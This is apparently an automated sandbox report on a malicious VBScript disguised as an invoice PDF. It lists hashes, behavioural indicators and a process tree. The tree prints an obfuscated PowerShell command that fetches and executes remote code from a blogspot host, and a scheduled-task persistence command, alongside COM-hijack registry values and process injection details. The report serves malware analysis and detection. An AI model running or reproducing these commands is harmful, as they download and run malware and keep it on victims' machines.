Analysis
-
max time kernel
142s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
16/08/2023, 13:44
Static task
static1
Behavioral task
behavioral1
Sample
lnvoice #72993 pdf.vbs
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
lnvoice #72993 pdf.vbs
Resource
win10v2004-20230703-en
General
-
Target
lnvoice #72993 pdf.vbs
-
Size
8KB
-
MD5
267ec14523d9fda264f9fbee934eebe0
-
SHA1
e19bfb59009da3d192f024222070e01a9a1bb258
-
SHA256
19a3ad194ce6897b529e09a60beb959520e5fc70930d95393d304a42a70a7119
-
SHA512
a2d95be94aa3629e4be2341135213caf486426e36ca34fd1a89e38767ed0257f08e90bd2b694e6b3134495cde9cf746845c54141a7e4ecec2d468c34b6622652
-
SSDEEP
24:vOOOOOOamMMM9Mk4wMUMbwMRMUMqMMMBeMZMTMoMVnnLecYMSQxH:6mKywV8V9nDW
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 4812 powershell.exe 9 4812 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kilng.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kilng.vbs powershell.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 api.ipify.org 27 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4812 set thread context of 752 4812 powershell.exe 90 PID 4812 set thread context of 1640 4812 powershell.exe 91 PID 4812 set thread context of 5064 4812 powershell.exe 92 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4004 schtasks.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4812 powershell.exe 4812 powershell.exe 752 RegSvcs.exe 752 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 4812 powershell.exe Token: SeRestorePrivilege 1808 dw20.exe Token: SeBackupPrivilege 1808 dw20.exe Token: SeBackupPrivilege 1808 dw20.exe Token: SeBackupPrivilege 3660 dw20.exe Token: SeBackupPrivilege 3660 dw20.exe Token: SeBackupPrivilege 1808 dw20.exe Token: SeBackupPrivilege 1808 dw20.exe Token: SeDebugPrivilege 752 RegSvcs.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 4632 wrote to memory of 4812 4632 WScript.exe 83 PID 4632 wrote to memory of 4812 4632 WScript.exe 83 PID 4812 wrote to memory of 752 4812 powershell.exe 90 PID 4812 wrote to memory of 752 4812 powershell.exe 90 PID 4812 wrote to memory of 752 4812 powershell.exe 90 PID 4812 wrote to memory of 752 4812 powershell.exe 90 PID 4812 wrote to memory of 752 4812 powershell.exe 90 PID 4812 wrote to memory of 752 4812 powershell.exe 90 PID 4812 wrote to memory of 752 4812 powershell.exe 90 PID 4812 wrote to memory of 752 4812 powershell.exe 90 PID 4812 wrote to memory of 1640 4812 powershell.exe 91 PID 4812 wrote to memory of 1640 4812 powershell.exe 91 PID 4812 wrote to memory of 1640 4812 powershell.exe 91 PID 4812 wrote to memory of 1640 4812 powershell.exe 91 PID 4812 wrote to memory of 1640 4812 powershell.exe 91 PID 4812 wrote to memory of 1640 4812 powershell.exe 91 PID 4812 wrote to memory of 1640 4812 powershell.exe 91 PID 4812 wrote to memory of 1640 4812 powershell.exe 91 PID 4812 wrote to memory of 5064 4812 powershell.exe 92 PID 4812 wrote to memory of 5064 4812 powershell.exe 92 PID 4812 wrote to memory of 5064 4812 powershell.exe 92 PID 4812 wrote to memory of 5064 4812 powershell.exe 92 PID 4812 wrote to memory of 5064 4812 powershell.exe 92 PID 4812 wrote to memory of 5064 4812 powershell.exe 92 PID 4812 wrote to memory of 5064 4812 powershell.exe 92 PID 4812 wrote to memory of 5064 4812 powershell.exe 92 PID 4812 wrote to memory of 4004 4812 powershell.exe 93 PID 4812 wrote to memory of 4004 4812 powershell.exe 93 PID 5064 wrote to memory of 1808 5064 Msbuild.exe 95 PID 5064 wrote to memory of 1808 5064 Msbuild.exe 95 PID 5064 wrote to memory of 1808 5064 Msbuild.exe 95 PID 1640 wrote to memory of 3660 1640 RegSvcs.exe 96 PID 1640 wrote to memory of 3660 1640 RegSvcs.exe 96 PID 1640 wrote to memory of 3660 1640 RegSvcs.exe 96
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lnvoice #72993 pdf.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $((irm ckc0.blogspot.com/atom.xml) | .('{1}{0}'-f'dasdwdwd','I').replace('dasdwdwd','ex'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Registers COM server for autorun
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Suspicious use of AdjustPrivilegeToken
PID:3660
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 187 /tn clomepe /F /tr "wscript //nologo C:\\ProgramData\\TUKHAMTASSER\\kilng.vbs"3⤵
- Creates scheduled task(s)
PID:4004
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
255B
MD58f81b3effafd9936e04c0cae33244524
SHA148f32711a8b3f076c038cac161b46c3b96bb56c3
SHA2568e5d7826bff2c2c294da10043436e223dfb4553ea489966fd20a78fb309ddbfe
SHA51256aee2e746b3230ee744f081162a1a57837b661b997ba1d0be06fc54779e339bb6ed64c61c75cdbb19c66242d371362aea6e603ab4d5122921977a6e5697a287
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82